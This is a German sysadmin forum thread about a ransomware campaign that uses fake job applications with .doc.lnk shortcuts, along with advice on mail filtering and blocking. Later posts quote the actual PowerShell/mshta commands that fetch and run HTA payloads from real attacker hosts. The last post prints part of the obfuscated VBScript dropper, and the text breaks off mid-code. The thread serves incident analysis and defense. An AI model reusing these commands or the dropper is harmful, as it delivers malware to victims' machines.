lochkartenstanzer
Goto Top

Neuer Kryptotrojaner mit Dateiendung gZpR1?

Moin Leute,

bin wieder als Feuerwehr gerufen worden, weil jemand eine "Bewerbung" auf eine (tatsächlich) offene Stelle aufgemacht hat und sich damit einen aktuellen Trojaner eingefangen hat.

Scheint aber laut virustotal noch nicht bei allzuvielen (heute morgen ca ein halbes Dutzend) Scannern bekannt zu sein und wenn, dann nur als "Generic Trojan".

Ist zufällig jemand anders hier auch darüber "gestolpert"?

Aktuell läuft eine Neuinstallation Daten aus Backup reinholen. Zum Glück hat es nur einen PC getroffen und er wurde recht zeitig hart ausgeschaltet.

lks

Content-Key: 479749

Url: https://administrator.de/contentid/479749

Printed on: February 25, 2024 at 13:02 o'clock

Member: Bitboy
Bitboy Jul 31, 2019 at 15:48:17 (UTC)
Goto Top
Moin,

es kam also eine Bewerbung.docm die dann aufgeklickt wurde?

Grüße
Member: Dani
Dani Jul 31, 2019 updated at 15:50:30 (UTC)
Goto Top
Moin,
Ist zufällig jemand anders hier auch darüber "gestolpert"?
bisher nocht keine Bekannschaft mit dieser Dateiendung gemacht.

..., weil jemand eine "Bewerbung" auf eine (tatsächlich) offene Stelle aufgemacht hat und sich damit einen aktuellen Trojaner eingefangen hat.
Kannst du sagen, was im Anhang der E-Mail für Dateien waren?

Scheint aber laut virustotal noch nicht bei allzuvielen (heute morgen ca ein halbes Dutzend) Scannern bekannt zu sein und wenn, dann nur als "Generic Trojan".
Könnte dazu der Artikel von Heise von gestern passen?
https://www.heise.de/security/meldung/Sodinokibi-aka-REvil-der-neue-Shoo ...
https://www.heise.de/security/meldung/Aktuelle-Spam-Mails-verteilen-Rans ...

Das würde auch für mich erklären, warum bisher noch keine Klassifizierung bei Virustotal stattgefunden hat.


Gruß,
Dani
Member: Lochkartenstanzer
Lochkartenstanzer Jul 31, 2019 at 16:04:51 (UTC)
Goto Top
Zitat von @Bitboy:

es kam also eine Bewerbung.docm die dann aufgeklickt wurde?

Jupp. Trotz Schulung und Warnung, etc, weil: "Es sind aktuell Stellen ausgeschrieben und das Anschreiben paßte dazu"

lks
Member: Lochkartenstanzer
Lochkartenstanzer Jul 31, 2019 updated at 16:54:57 (UTC)
Goto Top
Zitat von @Dani:

Kannst du sagen, was im Anhang der E-Mail für Dateien waren?

ArbeitszeugnisseX-XLebenslaufX-XDorisXSammer.desc: UTF-8 Unicode text, with very long lines
ArbeitszeugnisseX-XLebenslaufX-XDorisXSammer.zip:  Zip archive data, at least v2.0 to extract
Doris Sammer - Arbeitszeugnisse Aktuell.doc.lnk:   MS Windows shortcut
Doris Sammer - Lebenslauf Aktuell.doc.lnk:         MS Windows shortcut
DorisXSommerX-XBewerbungsfoto.jpg:                 JPEG image data, JFIF standard 1.01

  • jpg und zip waren als Mime-Attachment dran.
  • .desc ist der textinhalt der Mail
  • die beiden lnk-dateien waren inhalt der zip-datei

Nähere Untersuchungen folgen noch.

lks

nachtrag:

~/Trojaner# strings *lnk
/C:\
windows
System32
WindowsPowerShell
v1.0
powershell.exe
%SystemRoot%\System32\imageres.dll
1SPS
/C:\
windows
System32
WindowsPowerShell
v1.0
powershell.exe
%SystemRoot%\System32\imageres.dll
1SPS

Also per Powershell eingeschleust.

Update 2

https://www.virustotal.com/gui/file/0d37cec747d810c062239564533d8d96f3db ...

Aktuell 21/54 die ihn erkennen.
Member: Dani
Dani Jul 31, 2019 at 20:19:26 (UTC)
Goto Top
Moin,
Also per Powershell eingeschleust.
Was ich noch nicht verstehe, was wurde durch die Powershell aufgerufen? Denn die imageres.dll beinhaltet die Icons, welche man einer Verknüpfung zuweisen kann.


Gruß,
Dani
Member: Lochkartenstanzer
Lochkartenstanzer Jul 31, 2019 at 20:43:09 (UTC)
Goto Top
Zitat von @Dani:

Moin,
Also per Powershell eingeschleust.
Was ich noch nicht verstehe, was wurde durch die Powershell aufgerufen? Denn die imageres.dll beinhaltet die Icons, welche man einer Verknüpfung zuweisen kann.


http://blog.trendmicro.de/trend-angreifer-nutzen-haeufiger-lnk-dateien- ...

Schon bei Locky kam das zur Anwendung.

lks
Member: Lochkartenstanzer
Lochkartenstanzer Jul 31, 2019 at 20:59:37 (UTC)
Goto Top

Momentan sind es aus irgendwelchen komischen Gründen nur noch 19/54. face-sad

lks
Member: VGem-e
VGem-e Aug 01, 2019 at 05:22:09 (UTC)
Goto Top
Moin,

der Fall von @lks bestätigt mich wieder darin, trotz anderslautender Kollegenwünsche alle Archivdateien am Mailserver geblockt zu halten und solche Anhänge ohne Quarantäne ins digitale Nirwana "abzulegen"!

Gruß
Member: departure69
departure69 Aug 01, 2019 updated at 06:18:09 (UTC)
Goto Top
Und ich bin immer noch froh, seit Aufkommen des allerersten Locky bis heute immer noch keine MS-Office-Dateien als Mail-Anhang anzunehmen, derlei Mails werden am Exchange abgewiesen und der Absender kriegt einen NDR, daß er gefälligst ein PDF senden soll.

Wenn wirklich mal ein MS-Office-Dokument per Mail "durch" muß, weil es noch bearbeitet werden muß (z. B. ein Excel-Sheet, in das was einzutragen ist, das ist per PDF so gut wie unmöglich) haben wir ein paar Notfallwege, die nur eingeweihten und von mir persönlich geschulten und sensibilisierten Powerusern zur Verfügung steht. Ansonsten: Fast niemand muß Office-Dateien an uns versenden, PDF passt (fast) immer. Fazit: Die Sperre bleibt. Basta. face-wink

Viele Grüße
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 at 06:23:03 (UTC)
Goto Top
Zitat von @departure69:

Und ich bin immer noch froh, seit Aufkommen des allerersten Locky bis heute immer noch keine MS-Office-Dateien als Mail-Anhang anzunehmen, derlei Mails werden am Exchange abgewiesen und der Absender kriegt einen NDR, daß er gefälligst ein PDF senden soll.

Es waren keine Office-Dateien, sondern einen Zip-Datei mit zwei LNK-Dateien, die so taten, als ob sie ein DOC wären und ein JPG mit einem hübschen Frauenbild, vermutlich irgendwo geklaut.

Nach ersten Erkenntnissen startet die LNK-datei ein powershell-skript, daß dann den Payload erst herunterlädt.

lks
Member: Penny.Cilin
Penny.Cilin Aug 01, 2019 at 06:41:24 (UTC)
Goto Top
Moin,

und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"

P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.

Gruss Penny.
Member: Bitboy
Bitboy Aug 01, 2019 at 07:39:09 (UTC)
Goto Top
Moin,

schwierig auf der Basis die User die User zu trainieren. Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt. Auf der anderen Seite dürfte die imageres dafür sorgen, dass schon ein passendes Icon angezeigt und dann ist der Anwender eh darauf fixiert.

Gepackte Dateien komplett sperren dürfte auch vielen Workflows zuwieder laufen.

Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.

Andere Vorschläge?

Grüße
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 at 07:40:25 (UTC)
Goto Top
Zitat von @Bitboy:

Andere Vorschläge?

Papier und Bleistift. face-smile

lks
Member: departure69
departure69 Aug 01, 2019 at 07:43:36 (UTC)
Goto Top
@Lochkartenstanzer:

Verstehe.

Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?


Viele Grüße

von

departure69
Member: goscho
goscho Aug 01, 2019 at 07:45:38 (UTC)
Goto Top
Moin
Zitat von @Penny.Cilin:
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"

P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Womöglich hat sich der/die/das jenige noch als Bürokaufmann beworben. face-wink

Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.

PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden. face-sad
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 at 07:48:14 (UTC)
Goto Top
Zitat von @departure69:

@Lochkartenstanzer:

Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?

Kann ich jetz tncht nachvollziehen, muß den Mitarbeiter des Kunden mal fragen. Aber ich gehe davon aus, daß er das LNK innerhalb der ZIP angeklickt hat.

Sonst wäre es eine neue "Qualität"

lks
Member: Penny.Cilin
Penny.Cilin Aug 01, 2019 at 07:54:09 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:

Zitat von @Bitboy:

Andere Vorschläge?

Papier und Bleistift. face-smile
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.

lks
Gruss Penny.
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 updated at 07:58:41 (UTC)
Goto Top
Zitat von @Penny.Cilin:

Zitat von @Lochkartenstanzer:

Papier und Bleistift. face-smile
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.

Wobei man da natürlich auch aufpassen muss, wenn da (Puder-)Zucker im Umschlag bei den eingehenden Briefen ist. face-smile

Oder der Brief tickt.

lks
Member: Penny.Cilin
Penny.Cilin Aug 01, 2019 at 08:01:17 (UTC)
Goto Top
Zitat von @goscho:

Moin
Zitat von @Penny.Cilin:
und ich wollte schon schreiben "Wer nimmt den Bewerbungsunterlagen im Wordformat (doc, docx, docm, usw.) an?"

P.S. gerade die Woche erlebt, daß jemand seine Bewerbungsunterlagen im Excelformat eingereicht hat. - Und nee das ist kein Witz.
Selbst das Anschreiben war im Excelformat.
Womöglich hat sich der/die/das jenige noch als Bürokaufmann beworben. face-wink

Der Sohn einer Bekannten hat sich jetzt nach Abschluss der Ausbildung auch auf mehrere Stellenanzeigen beworben und wollte alles als Word-Anhänge verschicken, bis ich ihn aufgeklärt habe.
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.

PS: Ganz aktuell habe ich bei einem Kunden 10 Bewerbungen auf eine ausgeschriebene Stelle aus der Quarantäne zustellen lassen. Alle hatten Word-Dokumente angehängt. Anscheinend ist fast niemand in der Lage eine Bewerbung als PDF-Anhang zu versenden. face-sad
Oder die PDF-Dokumente sind dermaßen groß, daß diese auch schon wieder geblockt werden.
ich kenne den Fall, da hat sich jemand beim Arbeitsamt auf eine Stelle beworben und sich beschwert, daß die E-Mailbewerbung wegen der Größe (40 / 50 MB?) abgelehnt wurde. Und das war eine IT-Stelle. Dieser IT'ler (Informatik Trottel) war nicht in der Lage ein PDF mit einer annehmbaren Größe zu erstellen.
Der Sachbearbeiter hat mich dann gefragt, wie groß meine Bewerbungsunterlagen sind. meine Antwort war: Komplette Unterlagen mit allen Zeugnissen, Referenzen, Lebenslauf, Deckblatt und Anschreiben max. 5 MiB. Umfang knapp 80 Seiten.
Und das alles in sehr guter Qualität.

Gruss Penny.
Member: Bitboy
Bitboy Aug 01, 2019 at 08:09:15 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:

Zitat von @Bitboy:

Andere Vorschläge?

Papier und Bleistift. face-smile

lks

Mein Papier ist irgendwie buggy und ich kann keinen fix dafür herunterladen :/
https://images.earthtouchnews.com/media/1424/2013-09-05-paper-bugs-04.jp ...
Member: Bitboy
Bitboy Aug 01, 2019 at 08:23:41 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:

Zitat von @Penny.Cilin:

Zitat von @Lochkartenstanzer:

Papier und Bleistift. face-smile
Rohrpost, Buschtrommeln, Rauchzeichen, Turnschuh Admin / -Mitarbeiter, Flurfunk.
Kurz gesagt alles analoge, wie früher.

Wobei man da natürlich auch aufpassen muss, wenn da (Puder-)Zucker im Umschlag bei den eingehenden Briefen ist. face-smile

Oder der Brief tickt.

lks


Um einen Post von neulich aufzugreifen hätt ich noch die Idee die Bewerbung auf USB Stick zu schicken. Aber keiner der Dateien enthält sondern sich als Tastatur ausgibt und beim Einstecken ein Word öffnet und die Bewerbung live "tippt". Der einzige Satz lautet dann "Wenn sie das lesen können brauchen Sie wirklich dringend einen IT-Administrator."

Mhhh son Chip kostet nur 9 Euro und die Firmen sind auch noch verpflichtet die Bewerbungsunterlagen zurück zu schicken...
face-smile hrhrhrhr
gekauft...
Member: Dani
Dani Aug 01, 2019 at 10:18:27 (UTC)
Goto Top
@Penny.Cilin
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.

@Bitboy
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.
Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.

Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Ich meine mal gelesen zu haben, dass das nicht viel bringt. Denn theoretisch kann vor dem Ausführen die Policy einfach temporär geändert werden. Somit wird jedes Skript wieder ausgeführt. Meiner Meinung nach bringt noch ein kluges Konzept mit Applocker etwas dagegen.

Gepackte Dateien komplett sperren dürfte auch vielen Workflows zuwieder laufen.
Braucht man doch nicht. Solange die Applikation nach den definierten Mustern auch darin sucht, sehe ich kein Gefahr.

@goscho
Erst die Aussage, dass Office-Anhänge bei vielen ohne Rückantwort geblockt werden, hat ihn überzeugt, PDF-Dokumente zu erzeugen.
Für solche Maßnahmen ohne Rückmeldung gehört dem Admin der Gegenstelle der Hintern versohlt. Das macht man nicht sollte auch nicht Gang und Gebe werden.


Gruß,
Dani
Member: Penny.Cilin
Penny.Cilin Aug 01, 2019 at 10:30:10 (UTC)
Goto Top
Zitat von @Dani:

@Penny.Cilin
Im Zeitalter des Fachkräftemangel kannst du eine vollständige Blockade von Word-Dateien nicht durchsetzen. Umso größer das Unternehmen um so schwerer wird es. Auf eine Stelle bei uns hatten wir vor kurzem 600 Bewerbungen. Da war alles dabei... doc, docx, PDF, JPG, PNG, etc... Meinst du was in der Personalabteilung los ist, wenn wir technisch verbieten, dass die Dateien bzw. E-Mails abgelehnt werden.
@Dani
Doch das geht. Dafür gibt es ein Prozessmanagement. Und wenn es keines gibt, dann gibt es einen Datenschutzbeauftragten. Ich bin derzeit in einem mittelständigem Konzern (60 000 Mitarbeiter), wo ich genau das mit den Prozessmanagern und dem Datenschutzbeauftragten dabei bin dies durchzusetzen. Unser Argument ist: Gefahr durch Verschlüsselungstrojaner.

Und wie schon @Bitboy schreibt und Du darauf antwortest:

@Bitboy
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.
Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.


Gruß,
Dani

P.S. Wenn ein Unternehmen einen Verschlüsselungstrojaner eingefangen hat, dann ist es leichter für die IT zu argumentieren.
Wichtig dabei ist, hartnäckig bleiben. Und ja, es gibt keine 100%ige Sicherheit. Die wird es NIE geben.

Gruss Penny.
Member: Bitboy
Bitboy Aug 01, 2019 at 11:47:45 (UTC)
Goto Top
Zitat von @Dani:

@Bitboy
Zunächst mal müssten Dateiendungen eingeschaltet werden, dass zumindest erkennbar ist, dass es sich um ein lnk statt ein doc handelt.
Das ist genau das Szenario wo ich oben angesprochen habe. MIME-Typ gegen Dateiendung prüfen und wenn diese nicht passt, abweisen.
Wir haben unsere Filter mit dem neuen Muster doc.lnk und Bildformate im Anhang bzw. im Archiv erweitert. Denn sowas verschickt eigentlich kein Geschäftspartner absichtlich.


Was setzt ihr zum Filtern ein?

Bliebe noch die Variante nur signierte Powershellscripte auszuführen (Hier wärs intressant zu wissen was eigentlich genau ausgeführt wurde), je nach Umgebung, und Anwendung bedeutet das aber erheblichen administrativen Aufwand, den nicht jeder erbringen kann.
Ich meine mal gelesen zu haben, dass das nicht viel bringt. Denn theoretisch kann vor dem Ausführen die Policy einfach temporär geändert werden. Somit wird jedes Skript wieder ausgeführt. Meiner Meinung nach bringt noch ein kluges Konzept mit Applocker etwas dagegen.


Ohhh... Dann funktioniert das ja ähnlich gut wie die Macro Signatur in Office. Wozu genau hat man das dann eigentlich eingebaut? o0
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 updated at 12:10:40 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:

Zitat von @departure69:

@Lochkartenstanzer:

Hat es für die Attacke genügt, die Zip zu entpacken, oder mußte eine der - entpackten - Dateien ausgeführt werden?

Kann ich jetzt nicht nachvollziehen, muß den Mitarbeiter des Kunden mal fragen. Aber ich gehe davon aus, daß er das LNK innerhalb der ZIP angeklickt hat.

Der Mitarbeiter hat das ZIP-File ausgepackt und auf die angelblichen "DOC"-Dateien geklickt.

In den lnk-Dateien steht
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "$hk=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$hk=$hk+'://178.33.106.120/out-1123954163.hta';mshta $hk
als Ziel.

%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
als "Ausführen in"

und als Kommentar noch
dzyOkgSQi

Also hat der Link ganz einfach per Powershell

h-t-t-p-face-confused-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.

Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).

lks

PS: Die Firma benötigt öfters Leute für einfach Arbeiten und dementsprechend sind die Bewerber oft, ich sag mal so, "einfach gestrickt". Da kommen anscheinend öfters z.B. mit dem Handy fotografierte "Freßzettel", irgendwelche wilden Dokumentenformate und vieles andere mehr als "Bewerbung" an. An der Malware-Mail fiel die korrekte Rechtschreibung und ordentliches Deutsch positiv auf, so daß der Mitarbeiter mal von einer "positiven Ausnahme" bei den Bewerbungen ausging.
Member: goscho
goscho Aug 01, 2019 at 12:21:55 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:
Also hat der Link ganz einfach per Powershell

h-t-t-p-face-confused-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.
Ich musste jetzt extra alle Striche entfernen, um den Link aufrufen zu können.
Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).
Ups face-big-smile

PS: Die Firma benötigt öfters Leute für einfach Arbeiten und dementsprechend sind die Bewerber oft, ich sag mal so, "einfach gestrickt". Da kommen anscheinend öfters z.B. mit dem Handy fotografierte "Freßzettel", irgendwelche wilden Dokumentenformate und vieles andere mehr als "Bewerbung" an. An der Malware-Mail fiel die korrekte Rechtschreibung und ordentliches Deutsch positiv auf, so daß der Mitarbeiter mal von einer "positiven Ausnahme" bei den Bewerbungen ausging.
Da hatte jemand in der Personalabteilung nicht mitgedacht.
Besser, die Sachen werden herausgefiltert und erst manuell geprüft.
Member: Lochkartenstanzer
Lochkartenstanzer Aug 01, 2019 updated at 12:48:54 (UTC)
Goto Top
Zitat von @goscho:

Zitat von @Lochkartenstanzer:
Also hat der Link ganz einfach per Powershell

h-t-t-p-face-confused-/-1-7-8-.-3-3-.-1-0-6-.-1-2-0/-o-u-t---1-1-2-3-9-5-4-1-6-3-.-h-t-a heruntergeladen und ausgeführt.
Ich musste jetzt extra alle Striche entfernen, um den Link aufrufen zu können.
Die Browser blockieren die URL schon. (Die Striche sind dazu da, um die Idioten vor sich selbst zu schützen!).
Ups face-big-smile

Der Host Webserver ist übrigens nicht mehr erreichbar. Schade, mich hätte das Script in der HTA-Datei interessiert.


nmap sagt:
Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-01 14:46 CEST
Nmap scan report for ip120.ip-178-33-106.eu (178.33.106.120)
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
3389/tcp open   ms-wbt-server
5060/tcp closed sip
5061/tcp closed sip-tls

vermutlich ein gehackter Router oder ein Host, der per RDP ferngewartet wird.

lks
Member: Dani
Dani Aug 01, 2019 updated at 18:49:29 (UTC)
Goto Top
@Lochkartenstanzer
Der Host Webserver ist übrigens nicht mehr erreichbar. Schade, mich hätte das Script in der HTA-Datei interessiert.
Komisch, sonst reagiert OVH auf Abuse Meldungen eigentlich langsam bis gar nicht. Ich würde an deiner Stell auf dem Proxy/Firewall Dateiendungen HTA sperren. Denn im Regelfall benötigt niemand solch Dateien aus dem Internet.

@Penny.Cilin
Doch das geht. Dafür gibt es ein Prozessmanagement. Und wenn es keines gibt, dann gibt es einen Datenschutzbeauftragten. Ich bin derzeit in einem mittelständigem Konzern (60 000 Mitarbeiter), wo ich genau das mit den Prozessmanagern und dem Datenschutzbeauftragten dabei bin dies durchzusetzen. Unser Argument ist: Gefahr durch Verschlüsselungstrojaner.
Die Frage ist dochwie lange der Prozess dauern wird. Wir sind etwas größer als ihr und machen an diesem tiefgreifenden Einschnitt in die bestehende Arbeitsabläufe knapp ein Jahr rum. Zumal spätestens wenn Gewerkschaften und Finanz-/Personal-Controller ins Spiel kommen, z.B. die Arbeitszeit und die IT darf keine Hürden schaffen, unter den TOP10 Argumenten ist. Die IT ist eben nach wie vor nur Mittel zum Zweck, die Kohle kostet.

P.S. Wenn ein Unternehmen einen Verschlüsselungstrojaner eingefangen hat, dann ist es leichter für die IT zu argumentieren.
Wichtig dabei ist, hartnäckig bleiben. Und ja, es gibt keine 100%ige Sicherheit. Die wird es NIE geben.
Die Kunst in der IT ist es doch, die Anwender soweit wie möglich zu beschützen ohne das der Arbeitsablauf umständlich oder zeitraubend wird. Zumal man immer davon aus gehen soll, dass eine Infektion durch eine Malware passiert. Wichtig ist doch, entsprechende Maßnahmenkataloge zu haben damit alle richtig reagieren.


Gruß,
Dani
Member: Lochkartenstanzer
Lochkartenstanzer Aug 07, 2019 updated at 10:48:11 (UTC)
Goto Top
Moin,

Update

Heute kam diese "Bewerbung" an eine meiner honeypot-Adressen an. Die Dame heißt anders in Link steht:

 ..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe,%SYSTEMROOT%\System32\WindowsPowerShell\v1.0x"$fn=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$fn=$fn+'://gazastriptease.top/out-262635005.hta';mshta $fn" 

Also ist die Malware jetzt auf

h-t-t-p-face-confused-/-g-a-z-a-s-t-r-i-p-t-e-a-s-e-.-t-o-p-/-o-u-t---2-6-2-6-3-5-0-0-5-.-h-t-a


und der enthaltene hta-Code ist:

<html xmlns="http://www.w3.org/1999/xhtml">  
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
<script language="VBScript">  
    Public Function ePsNoAmjtS()
        ePsNoAmjtS = m_zbbHqyFirstSwitch
    End Function
    
    Public Function WekLPwHdDdFxFC(zbbHqy)
        Dim LBbaeCl
        WekLPwHdDdFxFC = ""  
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
                WekLPwHdDdFxFC = kuht(zbbHqy)
            End If
        End If
    End Function

    Public Function nqqUcB(zbbHqy)
        nqqUcB = False
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
                nqqUcB = True
            End If
        End If
    End Function

    Function JpAoAEKRCC(ArjFeoNni)
        ArjFeoNni = Replace(ArjFeoNni, "@", "")  
        ArjFeoNni = Replace(ArjFeoNni, "*", "")  
        ArjFeoNni = Replace(ArjFeoNni, "#", "")  
        JpAoAEKRCC = ArjFeoNni
    End Function

    Public Function ePsNoAmjtS()
        ePsNoAmjtS = m_zbbHqyFirstSwitch
    End Function
    
    Public Function WekLPwHdDdFxFC(zbbHqy)
        Dim LBbaeCl
        WekLPwHdDdFxFC = ""  
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
                WekLPwHdDdFxFC = kuht(zbbHqy)
            End If
        End If
    End Function

    Public Function nqqUcB(zbbHqy)
        nqqUcB = False
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
                nqqUcB = True
            End If
        End If
    End Function

    Function POWFfvlDUGnQKML(rXGpeBkQr, FFeeFUszA)
        On Error Resume Next
     
        Dim VCExVaLW
        Dim yTFSCNnrqtQkqcP
        Dim mRZosmAicTgzA
     
        For VCExVaLW = 1 To Len(rXGpeBkQr)
            yTFSCNnrqtQkqcP = Mid(rXGpeBkQr, VCExVaLW, 1)
            mRZosmAicTgzA = Asc(yTFSCNnrqtQkqcP)
            mRZosmAicTgzA = mRZosmAicTgzA Xor Len(FFeeFUszA)
            mRZosmAicTgzA = Chr(mRZosmAicTgzA)
            POWFfvlDUGnQKML = POWFfvlDUGnQKML & mRZosmAicTgzA
        Next
    End Function

    Function EAUJUQrlcGEWwFG(laGuwzQrkd)
        EAUJUQrlcGEWwFG = Len(laGuwzQrkd)
    End Function

    Public Function ePsNoAmjtS()
        ePsNoAmjtS = m_zbbHqyFirstSwitch
    End Function
    
    Public Function WekLPwHdDdFxFC(zbbHqy)
        Dim LBbaeCl
        WekLPwHdDdFxFC = ""  
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
                WekLPwHdDdFxFC = kuht(zbbHqy)
            End If
        End If
    End Function

    Public Function nqqUcB(zbbHqy)
        nqqUcB = False
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
                nqqUcB = True
            End If
        End If
    End Function

    Function AujSipdmcfmtIZ(GYDozL, xbZuLutP)
        Dim VAIXQ
        Dim vgDKwiF
        Dim cWBqjCKwBl
        Dim CBnhtvROBWJf
        Dim VdNmpUUu
        Dim uOatMJ
        Dim GkdMVutOqmk
        Dim fqcaXNK
        Dim StBHym
        Dim NDXnaxDDQ
        Dim iXQiRtcgmWEUplc
                
        CBnhtvROBWJf = 2      
        VAIXQ = EAUJUQrlcGEWwFG(GYDozL)
        VdNmpUUu = 8
        uOatMJ = 16 * 4

        For cWBqjCKwBl = 1 To VAIXQ Step 4
            Dim zIlis
            Dim OaRRODd
            Dim WuFeJHdca
            Dim MmrJRSmq
            Dim EgnwkcNgcIgofn
            Dim dzYTBeK
            Dim xuRJndLZwLYPC
            Dim URJApvGRUMy
            Dim lpIcVNAjHiIgkw
            Dim ONOzKt
            Dim SdwnMSAxfcsNR

            zIlis = 3
            EgnwkcNgcIgofn = 0

            For OaRRODd = 0 To 3
                WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)

                If WuFeJHdca = "=" Then  
                    zIlis = zIlis - 1
                    MmrJRSmq = 0
                Else
                    MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
                End If

                EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
            Next
                  
            EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
            EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn  
                  
            dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _  
                Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _  
                Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))  

            vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
        Next

        AujSipdmcfmtIZ = vgDKwiF
    End Function

    Public Function ePsNoAmjtS()
        ePsNoAmjtS = m_zbbHqyFirstSwitch
    End Function
    
    Public Function WekLPwHdDdFxFC(zbbHqy)
        Dim LBbaeCl
        WekLPwHdDdFxFC = ""  
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
                WekLPwHdDdFxFC = kuht(zbbHqy)
            End If
        End If
    End Function

    Public Function nqqUcB(zbbHqy)
        nqqUcB = False
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
                nqqUcB = True
            End If
        End If
